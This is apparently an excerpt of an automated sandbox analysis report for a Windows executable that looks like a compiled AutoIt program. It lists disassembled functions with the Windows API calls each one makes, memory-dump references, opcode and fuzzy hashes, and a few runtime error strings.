                                                                                                    • Instruction ID: 3247f654447d2c3f8684a3e6cd09d4effc12cdff20ebc49f54fcf7a485a81278
                                                                                                    • Opcode Fuzzy Hash: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
                                                                                                    • Instruction Fuzzy Hash: F341C165C1021875DB51EBF4C98AECFB7ACEF05300F11896AE528E3161FB34E245C3A9
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00ABF953
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF3D1
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF454
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                                                                                                    • Instruction ID: f48f3979648ac037c29d6497a94b66169232784a8ffbed9118fe78df9e0df074
                                                                                                    • Opcode Fuzzy Hash: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                                                                                                    • Instruction Fuzzy Hash: BC411A31608680FEC7398B6D8C887BA7FA9AF56314F2C453CF59767562CA31A880D711
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B32D1B
                                                                                                    • GetDC.USER32(00000000), ref: 00B32D23
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32D2E
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B32D3A
                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B32D76
                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B32D87
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B32DC2
                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B32DE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864802216-0
                                                                                                    • Opcode ID: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                                                                                                    • Instruction ID: 40a4e64328ed3dd48f64b960fd8415447c4070a453b7caac736e89fa700a0223
                                                                                                    • Opcode Fuzzy Hash: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                                                                                                    • Instruction Fuzzy Hash: 85316D72201614BBEB114F54CC8AFEB3FA9EB09715F144065FE08AB291CA759C50C7A4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2931989736-0
                                                                                                    • Opcode ID: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                                                                                                    • Instruction ID: 93830b4aad345ef1e9b9ec060a0ccc2911427af0bd11f485a90adae81c5360ef
                                                                                                    • Opcode Fuzzy Hash: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                                                                                                    • Instruction Fuzzy Hash: C8219861B40A097BD62459118F82FBB37DCEE22384F5400A4FD055AAC2F722ED1089A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                    • API String ID: 0-572801152
                                                                                                    • Opcode ID: f53e55839fec5b5c5904e3878d47487bfcba4af5a14592e46911b4cbef8bbbc5
                                                                                                    • Instruction ID: 1cbb337eb9e91e4b9e87b80fa500b8761dccb30280b6b426f6cf339ecbec70d5
                                                                                                    • Opcode Fuzzy Hash: f53e55839fec5b5c5904e3878d47487bfcba4af5a14592e46911b4cbef8bbbc5
                                                                                                    • Instruction Fuzzy Hash: 9FD1B371A0061A9FDF20CF98D881BAEB7F5FF48354F1484A9E919AB291E770DD41CB90
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AE15CE
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE1651
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AE17FB,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE16E4
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE16FB
                                                                                                      • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE1777
                                                                                                    • __freea.LIBCMT ref: 00AE17A2
                                                                                                    • __freea.LIBCMT ref: 00AE17AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829977744-0
                                                                                                    • Opcode ID: fc4b47b8827a775d5a7b24e4f534fe2c889a4b56d169700f18718c0f5efc28e1
                                                                                                    • Instruction ID: 455793d82890471944ff2b22ad155aec0643b6b575f646fe9fb12ea883ea64a7
                                                                                                    • Opcode Fuzzy Hash: fc4b47b8827a775d5a7b24e4f534fe2c889a4b56d169700f18718c0f5efc28e1
                                                                                                    • Instruction Fuzzy Hash: 0D91B572E002A69EDF208FB6CD81EEE7BB5AF49750F184659E812E7181DB35DD40CB60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit
                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                    • API String ID: 2610073882-625585964
                                                                                                    • Opcode ID: 732f432fabc93a74d4f9671155b95e4fbdd9e68fa68830c6951699bd6f703c3a
                                                                                                    • Instruction ID: cbb9e1edf6777ec79402e0289d338279e369cb6f8bb1618c77b1430283dfa0de
                                                                                                    • Opcode Fuzzy Hash: 732f432fabc93a74d4f9671155b95e4fbdd9e68fa68830c6951699bd6f703c3a
                                                                                                    • Instruction Fuzzy Hash: E2917171A00225ABDF20CFA4D884FAEBBF8EF46714F108599F519AB291D7709D45CFA0
                                                                                                    APIs
                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B1125C
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B11284
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B112A8
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B112D8
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B1135F
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B113C4
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B11430
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                    • String ID:
                                                                                                    • API String ID: 2550207440-0
                                                                                                    • Opcode ID: a8810be3cd05f2c8c8d74d04dd8548485e531f90b5ce9f665bc1faa759860294
                                                                                                    • Instruction ID: 851aa296d78ee741550d45d0284e27618ec102de903c174718b2a80b30412379
                                                                                                    • Opcode Fuzzy Hash: a8810be3cd05f2c8c8d74d04dd8548485e531f90b5ce9f665bc1faa759860294
                                                                                                    • Instruction Fuzzy Hash: A991EF71A00219AFDB00DFA8D884BFEB7F5FF45714F6448A9E600E7291D774A981CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                                                                                                    • Instruction ID: e6f6722f8762a45557504a901515b8085739183273e059b8a5eac7be9581b4fe
                                                                                                    • Opcode Fuzzy Hash: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                                                                                                    • Instruction Fuzzy Hash: AB912671D40219EFCB14CFA9CD84AEEBBB8FF49320F248155E615B7252D774AA41CB60
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B2396B
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B23A7A
                                                                                                    • _wcslen.LIBCMT ref: 00B23A8A
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B23C1F
                                                                                                      • Part of subcall function 00B10CDF: VariantInit.OLEAUT32(00000000), ref: 00B10D1F
                                                                                                      • Part of subcall function 00B10CDF: VariantCopy.OLEAUT32(?,?), ref: 00B10D28
                                                                                                      • Part of subcall function 00B10CDF: VariantClear.OLEAUT32(?), ref: 00B10D34
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: f6c8ae987e9a1ff2acc7d913706636b2246351f1241400e9e5299cff0b014a2d
                                                                                                    • Instruction ID: c698cdb931498e128b36d3608857dab85f8e59ddfc42cd261e6c902d8e529e4d
                                                                                                    • Opcode Fuzzy Hash: f6c8ae987e9a1ff2acc7d913706636b2246351f1241400e9e5299cff0b014a2d
                                                                                                    • Instruction Fuzzy Hash: D89179746083119FC700EF24D58496ABBE4FF89714F1489ADF88A9B351DB34EE45CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                                                                                                      • Part of subcall function 00B0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
                                                                                                      • Part of subcall function 00B0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                                                                                                      • Part of subcall function 00B0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B24C51
                                                                                                    • _wcslen.LIBCMT ref: 00B24D59
                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B24DCF
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00B24DDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                    • String ID: NULL Pointer assignment
                                                                                                    • API String ID: 614568839-2785691316
                                                                                                    • Opcode ID: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                                                                                                    • Instruction ID: dfb54bfc02b64c30e874dea6c2f686290c6f6b778957d43a4d23e75784b59d06
                                                                                                    • Opcode Fuzzy Hash: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                                                                                                    • Instruction Fuzzy Hash: 1C910871D002299FDF14DFA4D891AEEBBB9FF09310F1085A9E519A7291DB349E44CF60
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 00B32183
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00B321B5
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B321DD
                                                                                                    • _wcslen.LIBCMT ref: 00B32213
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00B3224D
                                                                                                    • GetSubMenu.USER32(?,?), ref: 00B3225B
                                                                                                      • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                                                                                                      • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                                                                                                      • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B322E3
                                                                                                      • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 1ad8beb6788bed4c5afbde9fec681c19f7496c51f6e35a22ec8a7bd94339116a
                                                                                                    • Instruction ID: 7b458a94339b3426a987cdba00cceea0aabdda17772410e0c6fa498edff7b749
                                                                                                    • Opcode Fuzzy Hash: 1ad8beb6788bed4c5afbde9fec681c19f7496c51f6e35a22ec8a7bd94339116a
                                                                                                    • Instruction Fuzzy Hash: D4715D75A00215AFCB10DFA4CD85AAEBBF5EF49310F248499E916BB351DB34ED418B90
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 00B0AEF9
                                                                                                    • GetKeyboardState.USER32(?), ref: 00B0AF0E
                                                                                                    • SetKeyboardState.USER32(?), ref: 00B0AF6F
                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0AF9D
                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0AFBC
                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B0AFFD
                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B0B020
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                                                                                                    • Instruction ID: ca9d65e746198ee2b6991838d889173d8200c8062a45f5b32730b2be270fa5c2
                                                                                                    • Opcode Fuzzy Hash: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                                                                                                    • Instruction Fuzzy Hash: A15191A1A047D63DFB368334CC45BBABEE99B06304F0889C9E1D9968C2D799ACC4D751
                                                                                                    APIs
                                                                                                    • GetParent.USER32(00000000), ref: 00B0AD19
                                                                                                    • GetKeyboardState.USER32(?), ref: 00B0AD2E
                                                                                                    • SetKeyboardState.USER32(?), ref: 00B0AD8F
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B0ADBB
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B0ADD8
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B0AE17
                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B0AE38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                                                                                                    • Instruction ID: 5272706eb954ee66564b29b57b2f41506da94b43914ae05ed5de94dc82b8370b
                                                                                                    • Opcode Fuzzy Hash: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                                                                                                    • Instruction Fuzzy Hash: 4051F5A15047D53DFB338334CC95BBABEE8AB46300F1889D9E1D5568C3D694EC88D762
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00AE3CD6,?,?,?,?,?,?,?,?,00AD5BA3,?,?,00AE3CD6,?,?), ref: 00AD5470
                                                                                                    • __fassign.LIBCMT ref: 00AD54EB
                                                                                                    • __fassign.LIBCMT ref: 00AD5506
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AE3CD6,00000005,00000000,00000000), ref: 00AD552C
                                                                                                    • WriteFile.KERNEL32(?,00AE3CD6,00000000,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD554B
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD5584
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
